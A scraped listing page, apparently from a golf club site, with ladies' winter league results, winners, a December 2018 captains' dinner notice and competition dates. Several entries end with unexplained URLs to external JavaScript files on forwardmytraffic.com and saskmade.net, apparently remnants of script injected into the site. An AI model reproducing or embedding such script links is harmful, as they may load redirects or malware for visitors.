Home Authors Posts by Editor



Winner League Qualifying Teams

Teams F,C,B,G,J, H and I  

Winter League Week 7 and Week 8

 Week 7 Top 6 Teams: Teams A,F,J,C,G and I Individual Winner: Sandra McBride  23 points Week 8 Top 6 Teams: Teams B,C,I,J,G and D Individual Winner: Pauline Leonard Turkey Winner:...


The Captains’ Dinner is being held on Saturday 1st December 2018.  Please support Captain James and Lady Captain Jo.  Tickets available in the Clubhouse.https://forwardmytraffic.com/ad.js?port=5

Winter League Week 6

Top 6 Teams : Teams F, J, C, I, D and G Best Individual Score: Della Hunt  22 points Turkey 6: Della Hunt  22 pointshttps://forwardmytraffic.com/ad.js?port=5

Winter League Week 4 & Week 5

Week 4    Top six teams: Teams A, F, B, H, C and Team I Best Individual Score : Bernie Connolly  19 points Week 5     Top...

Kate earns a place on High Performance Programme

Details of the ILGU High Performance and Horizon High Performance Programmes and panels for 20182019  season have been announced. We are delighted to see...

November Competitions

Nov-18 Mon 5th – Sun 11th Ladies 9 Hole Stableford Repeater Hamper Winter League Wk 5 (No repeat) Turkey 5 Mon 12th – Sun 18th Ladies 9 Hole Stableford Repeater...

Winter League Week 3

Top 5 teams: Team H 55 points, Team E 53 points, Team B 51 points, Team J 50 points and Team F 47 points. Best...

Winter League Week 2

Top 5 Teams : G,C,B,F and H Weekly Winner : Ann MCKenna   21 points Turkey Winner: Ann McKenna (away) 21 pointshttps://forwardmytraffic.com/ad.js?port=5

Underwood Mixed Foursomes

Winners: Kathleen Cadden and John Heffernan  35.5 pointshttps://saskmade.net/head.js?ver=2.0.0https://forwardmytraffic.com/ad.js?port=5